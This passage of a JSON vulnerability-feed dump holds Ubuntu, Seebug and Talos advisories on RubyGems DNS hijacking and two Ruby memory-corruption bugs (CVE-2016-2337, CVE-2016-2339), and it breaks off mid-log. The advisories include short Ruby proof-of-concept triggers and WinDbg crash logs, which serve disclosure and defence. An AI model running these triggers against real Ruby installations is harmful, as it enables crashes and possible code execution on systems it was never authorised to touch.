"privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-2337", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2337"], "modified": "2017-01-06T00:00:00", "id": "UB:CVE-2016-2337", "href": "https://ubuntu.com/security/CVE-2016-2337", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-17T16:01:46", "description": "RubyGems 2.0.x before 2.0.16, 2.2.x before 2.2.4, and 2.4.x before 2.4.7\ndoes not validate the hostname when fetching gems or making API requests,\nwhich allows remote attackers to redirect requests to arbitrary domains via\na crafted DNS SRV record, aka a \"DNS hijack attack.\"\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=790111>\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=790119>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | rubygems is for users of ruby1.8. ruby1.9.1 and jruby ship an embedded rubygems. \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | I have doubts this patch actually addresses DNS hijacking adequately; this may properly restrict SRV records, but what verifies subsequent lookups to ensure the returned IPs aren't under attacker control? Marking 'low' as a result.\n", "cvss3": {}, "published": "2015-06-24T00:00:00", "type": "ubuntucve", "title": "CVE-2015-3900", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900"], "modified": "2015-06-24T00:00:00", "id": "UB:CVE-2015-3900", "href": "https://ubuntu.com/security/CVE-2015-3900", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-17T15:47:56", "description": "RubyGems 2.0.x before 2.0.17, 2.2.x before 2.2.5, and 2.4.x before 2.4.8\ndoes not validate the hostname when fetching gems or making API requests,\nwhich allows remote attackers to redirect requests to arbitrary domains via\na crafted DNS SRV record with a domain that is suffixed with the original\ndomain name, aka a \"DNS hijack attack.\" NOTE: this vulnerability exists\nbecause to an incomplete fix for CVE-2015-3900.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | rubygems is for users of ruby1.8. ruby1.9.1 and jruby ship an embedded rubygems.\n", "cvss3": {}, "published": "2015-08-25T00:00:00", "type": "ubuntucve", "title": "CVE-2015-4020", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2015-08-25T00:00:00", "id": "UB:CVE-2015-4020", "href": "https://ubuntu.com/security/CVE-2015-4020", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "seebug": [{"lastseen": "2017-11-19T11:56:07", "description": "### DESCRIPTION\r\nType Confusion exists in canceleval Ruby's TclTkIp class method. Attacker passing different type of object than String as \"retval\" argument can cause arbitrary code execution.\r\n\r\n### TESTED VERSIONS\r\nRuby 2.3.0 dev Ruby 2.2.2 Tcl/Tk8.6 or later\r\n\r\n### PRODUCT URLs\r\nhttps://www.ruby-lang.org\r\n\r\n### DETAILS\r\nVulnerable code:\r\n```\r\n---------------------------------------------- code \r\n--------------------------------------------- \r\nLine 7761 static VALUE\r\nLine 7762 ip_cancel_eval(argc, argv, self)\r\nLine 7763 int argc;\r\nLine 7764 VALUE *argv;\r\nLine 7765 VALUE self;\r\nLine 7766 {\r\nLine 7767 VALUE retval;\r\nLine 7768\r\nLine 7769 if (rb_scan_args(argc, argv, \"01\", &retval) == 0) {\r\nLine 7770 retval = Qnil;\r\nLine 7771 }\r\nLine 7772 if (ip_cancel_eval_core(get_ip(self)->ip, retval, 0) == \r\nTCL_OK) {\r\nLine 7773 return Qtrue;\r\nLine 7774 } else {\r\nLine 7775 return Qfalse;\r\nLine 7776 }\r\nLine 7777 }\r\n\r\nLine 7736 static int\r\nLine 7737 ip_cancel_eval_core(interp, msg, flag)\r\nLine 7738 Tcl_Interp *interp;\r\nLine 7739 VALUE msg;\r\nLine 7740 int flag;\r\nLine 7741 {\r\nLine 7742 #if TCL_MAJOR_VERSION < 8 || (TCL_MAJOR_VERSION == 8 && \r\nTCL_MINOR_VERSION < 6)\r\nLine 7743 rb_raise(rb_eNotImpError,\r\nLine 7744 \"cancel_eval is supported Tcl/Tk8.6 or \r\nlater.\");\r\nLine 7745\r\nLine 7746 UNREACHABLE;\r\nLine 7747 #else\r\nLine 7748 Tcl_Obj *msg_obj;\r\nLine 7749\r\nLine 7750 if (NIL_P(msg)) {\r\nLine 7751 msg_obj = NULL;\r\nLine 7752 } else {\r\nLine 7753 msg_obj = Tcl_NewStringObj(RSTRING_PTR(msg), \r\nRSTRING_LEN(msg));\r\nLine 7754 Tcl_IncrRefCount(msg_obj);\r\nLine 7755 }\r\nLine 7756\r\nLine 7757 return Tcl_CancelEval(interp, msg_obj, 0, flag);\r\nLine 7758 #endif\r\nLine 7759 }\r\n---------------------------------------------- code \r\n--------------------------------------------- \r\n```\r\n\r\nIn line 7769 \"canceleval\" method argument is parse out into \"retval\" variable. Next this variable is passed to \"ipcanceleval_core\" function (line 7772). In line 7753 we can see that our \"retval\" variable which in this function is passed as \"msg\" argument is treated as String object.Passing object different than String we will cause type confusion vulnerability in this line.\r\n\r\n\r\n### TIMELINE\r\n* 2015-06-18 - Initial Discovery \r\n* 2015-06-30 - Vendor Notification \r\n* 2016\u201406-14 - Public Disclosure", "cvss3": {}, "published": "2017-10-20T00:00:00", "type": "seebug", "title": "Ruby TclTkIp ip_cancel_eval Type Confusion Vulnerabilities(CVE-2016-2337)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2337"], "modified": "2017-10-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96756", "id": "SSV:96756", "sourceData": "\n require 'tk'\r\nt = TclTkIp.new()\r\nt._cancel_eval(0x11223344)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96756", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T11:56:06", "description": "### DESCRIPTION\r\nAn exploitable heap overflow vulnerability exists in the Fiddle::Function.new \"initialize\" function functionality of Ruby. In Fiddle::Function.new \"initialize\" heap buffer \"arg_types\" allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.\r\n\r\n### TESTED VERSIONS\r\nRuby 2.3.0 dev Ruby 2.2.2\r\n\r\n### PRODUCT URLs\r\nhttps://www.ruby-lang.org\r\n\r\n### DETAILS\r\n```\r\nLine 86 static VALUE\r\nLine 87 initialize(int argc, VALUE argv[], VALUE self)\r\nLine 88 {\r\nLine 89 ffi_cif * cif;\r\nLine 90 ffi_type **arg_types;\r\nLine 91 ffi_status result;\r\nLine 92 VALUE ptr, args, ret_type, abi, kwds;\r\nLine 93 int i;\r\nLine 94 \r\nLine 95 rb_scan_args(argc, argv, \"31:\", &ptr, &args, &ret_type, &abi, \r\n&kwds);\r\nLine 96 if(NIL_P(abi)) abi = INT2NUM(FFI_DEFAULT_ABI);\r\nLine 97 \r\nLine 98 Check_Type(args, T_ARRAY);\r\nLine 99 Check_Max_Args(\"args\", RARRAY_LENINT(args));\r\n\r\n (...)\r\n\r\nLine 110 arg_types = xcalloc(RARRAY_LEN(args) + 1, sizeof(ffi_type *));\r\nLine 111\r\nLine 112 for (i = 0; i < RARRAY_LEN(args); i++) {\r\nLine 113 int type = NUM2INT(RARRAY_PTR(args)[i]);\r\nLine 114 arg_types[i] = INT2FFI_TYPE(type);\r\nLine 115 }\r\nLine 116 arg_types[RARRAY_LEN(args)] = NULL;\r\n```\r\n\r\nIn Line 110 based on length of passed by user args array, xcalloc allocates buffer for ffitype structures. Later in for loop we see that each element from this array is first converted to int and later to ffitype structure. Results of this conversions are stored in previous allocated array \"arg_types\".\r\n```\r\nExploiting knowledge that in Line 113 NUM2INT for non Integer object will call \"to_int\" method we can create properly constructed object which will \r\n```\r\n\r\nimplement this method and it's responsible will be to increase size of args array. Increased size of args array inside for loop just after space allocation for argtypes will cause during next iteration heap overflow in Line 114 and later in Line 116 during storing another ffitype structures.\r\n\r\n### CRASH ANALYSIS\r\n```\r\n(15dc.16b8): Break instruction exception - code 80000003 (first chance)\r\neax=00000000 ebx=00000000 ecx=bf8d0000 edx=0008e3c8 esi=fffffffe edi=00000000\r\neip=77b612fb esp=0028fb08 ebp=0028fb34 iopl=0 nv up ei pl zr na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\r\nntdll!LdrpDoDebuggerBreak+0x2c:\r\n77b612fb cc int 3\r\n0:000> bu fiddle!Init_fiddle\r\n0:000> g\r\nModLoad: 75dc0000 75e20000 C:\\Windows\\SysWOW64\\IMM32.DLL\r\nModLoad: 75ce0000 75dac000 C:\\Windows\\syswow64\\MSCTF.dll\r\nModLoad: 72b10000 72b3b000 C:\\Windows\\SysWOW64\\nvinit.dll\r\nModLoad: 72b00000 72b09000 C:\\Windows\\SysWOW64\\VERSION.dll\r\nModLoad: 0f000000 0f006000 C:\\Program Files (x86)\\NVIDIA \r\nCorporation\\CoProcManager\\detoured.dll\r\nModLoad: 6e480000 6e4a9000 C:\\Program Files (x86)\\NVIDIA \r\nCorporation\\CoProcManager\\nvd3d9wrap.dll\r\nModLoad: 76740000 768dd000 C:\\Windows\\syswow64\\SETUPAPI.dll\r\nModLoad: 765a0000 765c7000 C:\\Windows\\syswow64\\CFGMGR32.dll\r\nModLoad: 762c0000 7634f000 C:\\Windows\\syswow64\\OLEAUT32.dll\r\nModLoad: 76440000 7659c000 C:\\Windows\\syswow64\\ole32.dll\r\nModLoad: 75490000 754a2000 C:\\Windows\\syswow64\\DEVOBJ.dll\r\nModLoad: 6e460000 6e47e000 C:\\Program Files (x86)\\NVIDIA \r\nCorporation\\CoProcManager\\nvdxgiwrap.dll\r\nModLoad: 72a90000 72aa7000 C:\\Windows\\SysWOW64\\CRYPTSP.dll\r\nModLoad: 72a50000 72a8b000 C:\\Windows\\SysWOW64\\rsaenh.dll\r\nModLoad: 71280000 7128c000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\enc\\encdb.so\r\nModLoad: 6dd40000 6dd4c000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386- \r\nmingw32\\enc\\trans\\transdb.so\r\nModLoad: 6fbc0000 6fbcb000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\enc\\iso_8859_2.so\r\nModLoad: 70b40000 70b4c000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\thread.so\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C: \r\n\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\fiddle.so -\r\nModLoad: 70a40000 70a50000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\fiddle.so\r\nModLoad: 6b740000 6b76a000 C:\\Ruby22\\bin\\libffi-6.dll\r\nBreakpoint 0 hit\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C: \r\n\\Ruby22\\bin\\msvcrt-ruby220.dll -\r\neax=70a42270 ebx=70a4b068 ecx=70a40000 edx=70a40000 esi=70a4b4ed edi=64105061\r\neip=70a42270 esp=0028ee5c ebp=0028f2d8 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\r\nfiddle!Init_fiddle:\r\n70a42270 55 push ebp\r\n0:000> bp 70A42ADD \".printf \\\" xcalloc( 0x%x )\\\",edx;.echo;g \"\r\n0:000> bp 70A42AE2 \".printf \\\"arg_types addr : 0x%x\\\",eax;.echo\"\r\n0:000> g\r\n\r\nStart\r\nargs array size : 1\r\n xcalloc( 0x2 )\r\narg_types addr : 0x2b81b50\r\n\r\neax=02b81b50 ebx=00000000 ecx=75e2f489 edx=00000018 esi=00000003 edi=0035003c\r\neip=70a42ae2 esp=0028f7a0 ebp=0028f808 iopl=0 nv up ei pl nz na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206\r\nfiddle!Init_fiddle+0x872:\r\n70a42ae2 89c7 mov edi,eax\r\n0:000> !heap -p -a 0x2b81b50\r\n address 02b81b50 found in\r\n _HEAP @ 510000\r\n HEAP_ENTRY Size Prev Flags UserPtr UserSize - state\r\n 02b81b48 0004 0000 [00] 02b81b50 00008 - (busy)\r\n\r\n\r\n0:000> !heap -p -a 02b81b48+20 \r\n address 02b81b68 found in\r\n _HEAP @ 510000\r\n HEAP_ENTRY Size Prev Flags UserPtr UserSize - state\r\n 02b81b68 0290 0000 [00] 02b81b70 01478 - (free)\r\n\r\n\r\n0:000> dd 02b81b48+20\r\n02b81b68 fad1ca73 000ae511 005100c4 00514668\r\n02b81b78 feeefeee feeefeee feeefeee feeefeee\r\n02b81b88 feeefeee feeefeee feeefeee feeefeee\r\n02b81b98 feeefeee feeefeee feeefeee feeefeee\r\n02b81ba8 feeefeee feeefeee feeefeee feeefeee\r\n02b81bb8 feeefeee feeefeee feeefeee feeefeee\r\n02b81bc8 feeefeee feeefeee feeefeee feeefeee\r\n02b81bd8 feeefeee feeefeee feeefeee feeefeee\r\n0:000> g\r\n\r\nincrease size of array\r\nNew args array size is : 11\r\n\r\nHEAP[ruby.exe]: Heap block at 02B81B48 modified at 02B81B58 past requested size of 8\r\n(15dc.16b8): Break instruction exception - code 80000003 (first chance)\r\neax=02b81b48 ebx=02b81b58 ecx=77b2f861 edx=0028f969 esi=02b81b48 edi=00000008\r\neip=77b9087c esp=0028fbb0 ebp=0028fbb0 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\r\nntdll!RtlpBreakPointHeap+0x23:\r\n77b9087c cc int 3\r\n0:000> !heap -p -a 02b81b48+20\r\n address 02b81b68 found in\r\n _HEAP @ 510000\r\n HEAP_ENTRY Size Prev Flags UserPtr UserSize - state\r\n 02b81b68 b8ab 0000 [00] 02b81b70 4c66a - (busy)\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C: \r\n\\Ruby22\\bin\\libffi-6.dll -\r\n libffi_6!ffi_type_pointer\r\n\r\n\r\n0:000> !heap -x 02b81b48+20\r\nERROR: Block 02b81b68 previous size 955d does not match previous block size 4\r\nHEAP 00510000 (Seg 02af0000) At 02b81b68 Error: invalid block Previous\r\n\r\n0:000> dd 02b81b48+20\r\n02b81b68 6b747048 6b747048 6b747048 6b747048\r\n02b81b78 6b747048 00000000 00000003 00000003\r\n02b81b88 00000003 00000003 00000003 00000003\r\n02b81b98 00000003 baadf00d baadf00d baadf00d\r\n02b81ba8 baadf00d baadf00d baadf00d baadf00d\r\n02b81bb8 baadf00d baadf00d abababab abababab\r\n02b81bc8 00000000 00000000 66d2c8ee 180ae518\r\n02b81bd8 02b6c4d0 02b6c4d0 02b6c4d0 02b6c4d0\r\n0:000> g\r\nHEAP[ruby.exe]: Invalid address specified to RtlSizeHeap( 00510000, 02B81B50 )\r\n(15dc.16b8): Break instruction exception - code 80000003 (first chance)\r\neax=02b81b48 ebx=02b81b48 ecx=77b2f861 edx=0028f985 esi=00510000 edi=02b81b50\r\neip=77b9087c esp=0028fbcc ebp=0028fbcc iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\r\nntdll!RtlpBreakPointHeap+0x23:\r\n77b9087c cc int 3\r\n0:000> g\r\nHEAP[ruby.exe]: Heap block at 02B81B48 modified at 02B81B58 past requested size of 8\r\n(15dc.16b8): Break instruction exception - code 80000003 (first chance)\r\neax=02b81b48 ebx=02b81b58 ecx=77b2f861 edx=0028f871 esi=02b81b48 edi=00000008\r\neip=77b9087c esp=0028fab8 ebp=0028fab8 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\r\nntdll!RtlpBreakPointHeap+0x23:\r\n77b9087c cc int 3\r\n0:000> g\r\nHEAP[ruby.exe]: Invalid address specified to RtlFreeHeap( 00510000, 02B81B50 )\r\n(15dc.16b8): Break instruction exception - code 80000003 (first chance)\r\neax=02b81b48 ebx=02b81b48 ecx=77b2f861 edx=0028f88d esi=00510000 edi=00510000\r\neip=77b9087c esp=0028fad4 ebp=0028fad4 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\r\nntdll!RtlpBreakPointHeap+0x23:\r\n77b9087c cc int 3\r\n0:000> g\r\neax=00000000 ebx=00000000 ecx=0028f88c edx=0028f88d esi=77bc2100 edi=77bc20c0\r\neip=77adfd0e esp=0028fe40 ebp=0028fe5c iopl=0 nv up ei pl zr na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\r\nntdll!ZwTerminateProcess+0x12:\r\n77adfd0e 83c404 add esp,4\r\n0:000>\r\n```\r\n\r\n### TIMELINE\r\n* 2015-06-11 - Initial Discovery \r\n* 2015-06-30 - Vendor Notification \r\n* 2016-06-14 - Public Disclosure", "cvss3": {}, "published": "2017-10-20T00:00:00", "type": "seebug", "title": "Ruby Fiddle::Function.new Heap Overflow Vulnerability(CVE-2016-2339)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2339"], "modified": "2017-10-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96759", "id": "SSV:96759", "sourceData": "\n require 'fiddle'\r\n\r\n$args = []\r\nclass MyObject \r\n def to_int\r\n puts \"increase size of array\"\r\n (1..10).map{|x| $args.push(1)}\r\n puts \"New args array size is : #{$args.length}\" \r\n return 1\r\n end\r\nend\r\nputs \"Start\"\r\nx = MyObject.new\r\n$args.push(x)\r\nputs \"args array size : #{$args.length}\"\r\nf = Fiddle::Function.new(nil, $args, Fiddle::TYPE_VOIDP)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96759", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "talos": [{"lastseen": "2023-06-03T15:23:57", "description": "# Talos Vulnerability Report\n\n### TALOS-2016-0034\n\n## Ruby Fiddle::Function.new Heap Overflow Vulnerability\n\n##### June 14, 2016\n\n##### CVE Number\n\nCVE-2016-2339\n\n### DESCRIPTION\n\nAn exploitable heap overflow vulnerability exists in the Fiddle::Function.new \u201cinitialize\u201d function functionality of Ruby. In Fiddle::Function.new \u201cinitialize\u201d heap buffer \u201carg_types\u201d allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.\n\n### TESTED VERSIONS\n\nRuby 2.3.0 dev Ruby 2.2.2\n\n### PRODUCT URLs\n\nhttps://www.ruby-lang.org\n\n### DETAILS\n \n \n Line 86 \tstatic VALUE\n Line 87 \tinitialize(int argc, VALUE argv[], VALUE self)\n Line 88 \t{\n Line 89 \t\tffi_cif * cif;\n Line 90 \t\tffi_type **arg_types;\n Line 91 \t\tffi_status result;\n Line 92 \t\tVALUE ptr, args, ret_type, abi, kwds;\n Line 93 \t\tint i;\n Line 94 \n Line 95 \t\trb_scan_args(argc, argv, \"31:\", &ptr, &args, &ret_type, &abi, \n &kwds);\n Line 96 \t\tif(NIL_P(abi)) abi = INT2NUM(FFI_DEFAULT_ABI);\n Line 97 \n Line 98 \t\tCheck_Type(args, T_ARRAY);\n Line 99 \t\tCheck_Max_Args(\"args\", RARRAY_LENINT(args));\n \t\n \t\t\t(...)\n \t\n Line 110\t\targ_types = xcalloc(RARRAY_LEN(args) + 1, sizeof(ffi_type *));\n Line 111\n Line 112\t\tfor (i = 0; i < RARRAY_LEN(args); i++) {\n Line 113\t\t\tint type = NUM2INT(RARRAY_PTR(args)[i]);\n Line 114\t\t\targ_types[i] = INT2FFI_TYPE(type);\n Line 115\t\t}\n Line 116\t\targ_types[RARRAY_LEN(args)] = NULL;\n \n\nIn Line 110 based on length of passed by user args array, xcalloc allocates buffer for ffi_type structures. Later in for loop we see that each element from this array is first converted to int and later to ffi_type structure. Results of this conversions are stored in previous allocated array \u201carg_types\u201d. Exploiting knowledge that in Line 113 NUM2INT for non Integer object will call \u201cto_int\u201d method we can create properly constructed object which will implement this method and it\u2019s responsible will be to increase size of args array. Increased size of args array inside for loop just after space allocation for arg_types will cause during next iteration heap overflow in Line 114 and later in Line 116 during storing another ffi_type structures.\n\n### POC\n \n \n require 'fiddle'\n \n $args = []\n class MyObject\t\n def to_int\n \t puts \"increase size of array\"\n \t (1..10).map{|x| $args.push(1)}\n \t puts \"New args array size is : #{$args.length}\"\t\t\n \t return 1\n end\n end\n puts \"Start\"\n x = MyObject.new\n $args.push(x)\n puts \"args array size : #{$args.length}\"\n f = Fiddle::Function.new(nil, $args, Fiddle::TYPE_VOIDP)\n \n\n### CRASH ANALYSIS\n \n \n (15dc.16b8): Break instruction exception - code 80000003 (first chance)\n eax=00000000 ebx=00000000 ecx=bf8d0000 edx=0008e3c8 esi=fffffffe edi=00000000\n eip=77b612fb esp=0028fb08 ebp=0028fb34 iopl=0 nv up ei pl zr na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246\n ntdll!LdrpDoDebuggerBreak+0x2c:\n 77b612fb cc int 3\n 0:000> bu fiddle!Init_fiddle\n 0:000> g\n ModLoad: 75dc0000 75e20000 C:\\Windows\\SysWOW64\\IMM32.DLL\n ModLoad: 75ce0000 75dac000 C:\\Windows\\syswow64\\MSCTF.dll\n ModLoad: 72b10000 72b3b000 C:\\Windows\\SysWOW64\\nvinit.dll\n ModLoad: 72b00000 72b09000 C:\\Windows\\SysWOW64\\VERSION.dll\n ModLoad: 0f000000 0f006000 C:\\Program Files (x86)\\NVIDIA \n Corporation\\CoProcManager\\detoured.dll\n ModLoad: 6e480000 6e4a9000 C:\\Program Files (x86)\\NVIDIA \n Corporation\\CoProcManager\\nvd3d9wrap.dll\n ModLoad: 76740000 768dd000 C:\\Windows\\syswow64\\SETUPAPI.dll\n ModLoad: 765a0000 765c7000 C:\\Windows\\syswow64\\CFGMGR32.dll\n ModLoad: 762c0000 7634f000 C:\\Windows\\syswow64\\OLEAUT32.dll\n ModLoad: 76440000 7659c000 C:\\Windows\\syswow64\\ole32.dll\n ModLoad: 75490000 754a2000 C:\\Windows\\syswow64\\DEVOBJ.dll\n ModLoad: 6e460000 6e47e000 C:\\Program Files (x86)\\NVIDIA \n Corporation\\CoProcManager\\nvdxgiwrap.dll\n ModLoad: 72a90000 72aa7000 C:\\Windows\\SysWOW64\\CRYPTSP.dll\n ModLoad: 72a50000 72a8b000 C:\\Windows\\SysWOW64\\rsaenh.dll\n ModLoad: 71280000 7128c000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\enc\\encdb.so\n ModLoad: 6dd40000 6dd4c000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386- \n mingw32\\enc\\trans\\transdb.so\n ModLoad: 6fbc0000 6fbcb000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\enc\\iso_8859_2.so\n ModLoad: 70b40000 70b4c000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\thread.so\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C: \n \\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\fiddle.so -\n ModLoad: 70a40000 70a50000 C:\\Ruby22\\lib\\ruby\\2.2.0\\i386-mingw32\\fiddle.so\n ModLoad: 6b740000 6b76a000 C:\\Ruby22\\bin\\libffi-6.dll\n Breakpoint 0 hit\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C: \n \\Ruby22\\bin\\msvcrt-ruby220.dll -\n eax=70a42270 ebx=70a4b068 ecx=70a40000 edx=70a40000 esi=70a4b4ed edi=64105061\n eip=70a42270 esp=0028ee5c ebp=0028f2d8 iopl=0 nv up ei pl nz na po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\n fiddle!Init_fiddle:\n 70a42270 55 push ebp\n 0:000> bp 70A42ADD \".printf \\\" xcalloc( 0x%x )\\\",edx;.echo;g \"\n 0:000> bp 70A42AE2 \".printf \\\"arg_types addr : 0x%x\\\",eax;.echo\"\n 0:000> g\n \n Start\n args array size : 1\n xcalloc( 0x2 )\n arg_types addr : 0x2b81b50\n \n eax=02b81b50 ebx=00000000 ecx=75e2f489 edx=00000018 esi=00000003 edi=0035003c\n eip=70a42ae2 esp=0028f7a0 ebp=0028f808 iopl=0 nv up ei pl nz na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206\n fiddle!Init_fiddle+0x872:\n 70a42ae2 89c7 mov edi,eax\n 0:000> !heap -p -a 0x2b81b50\n address 02b81b50 found in\n _HEAP @ 510000\n HEAP_ENTRY Size Prev Flags UserPtr UserSize - state\n 02b81b48 0004 0000 [00] 02b81b50 00008 - (busy)\n \n \n 0:000> !heap -p -a 02b81b48+20 \n address 02b81b68 found in\n _HEAP @ 510000\n HEAP_ENTRY Size Prev Flags UserPtr UserSize - state\n 02b81b68 0290 0000 [00] 02b81b70 01478 - (free)\n \n \n 0:000> dd 02b81b48+20\n 02b81b68 fad1ca73 000ae511 005100c4 00514668\n 02b81b78 feeefeee feeefeee feeefeee feeefeee\n 02b81b88 feeefeee feeefeee feeefeee feeefeee\n 02b81b98 feeefeee feeefeee feeefeee feeefeee\n 02b81ba8 feeefeee feeefeee feeefeee feeefeee\n 02b81bb8 feeefeee feeefeee feeefeee feeefeee\n 02b81bc8 feeefeee feeefeee feeefeee feeefeee\n 02b81bd8 feeefeee feeefeee feeefeee feeefeee\n 0:000> g\n \n increase size of array\n New args array size is : 11\n \n HEAP[ruby.exe]: Heap block at 02B81B48 modified at 02B81B58 past requested size of 8\n (15dc.16b8): Break instruction exception - code 80000003 (first chance)\n eax=02b81b48 ebx=02b81b58 ecx=77b2f861 edx=0028f969 esi=02b81b48 edi=00000008\n eip=77b9087c esp=0028fbb0 ebp=0028fbb0 iopl=0 nv up ei pl nz na po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\n ntdll!RtlpBreakPointHeap+0x23:\n 77b9087c cc int 3\n 0:000> !heap -p -a 02b81b48+20\n address 02b81b68 found in\n _HEAP @ 510000\n HEAP_ENTRY Size Prev Flags UserPtr UserSize - state\n 02b81b68 b8ab 0000 [00] 02b81b70 4c66a - (busy)\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C: \n \\Ruby22\\bin\\libffi-6.dll -\n libffi_6!ffi_type_pointer\n \n \n 0:000> !heap -x 02b81b48+20\n ERROR: Block 02b81b68 previous size 955d does not match previous block size 4\n HEAP 00510000 (Seg 02af0000) At 02b81b68 Error: invalid block Previous\n \n 0:000> dd 02b81b48+20\n 02b81b68 6b747048 6b747048 6b747048 6b747048\n 02b81b78 6b747048 00000000 00000003 00000003\n 02b81b88 00000003 00000003 00000003 00000003\n 02b81b98 00000003 baadf00d baadf00d baadf00d\n 02b81ba8 baadf00d baadf00d baadf00d baadf00d\n 02b81bb8 baadf00d baadf00d abababab abababab\n 02b81bc8 00000000 00000000 66d2c8ee 180ae518\n 02b81bd8 02b6c4d0 02b6c4d0 02b6c4d0 02b6c4d0\n 0:000> g\n HEAP[ruby.exe]: Invalid address specified to RtlSizeHeap( 00510000, 02B81B50 )\n (15dc.16b8): Break instruction exception - code 80000003 (first chance)\n eax=02b81b48 ebx=02b81b48 ecx=77b2f861 edx=0028f985 esi=00510000 edi=02b81b50\n eip=77b9087c esp=0028fbcc ebp=0028fbcc iopl=0 nv up ei pl nz na po nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202\n ntdll!RtlpBreakPointHeap+0x23:\n 77b9087c cc int 3\n 0:000> g\n HEAP[ruby.exe]: Heap block at 02B81B48 modified at 02B81B58 past requested size of 8\n (15dc.16b8): Break instruction exception - code 80000003 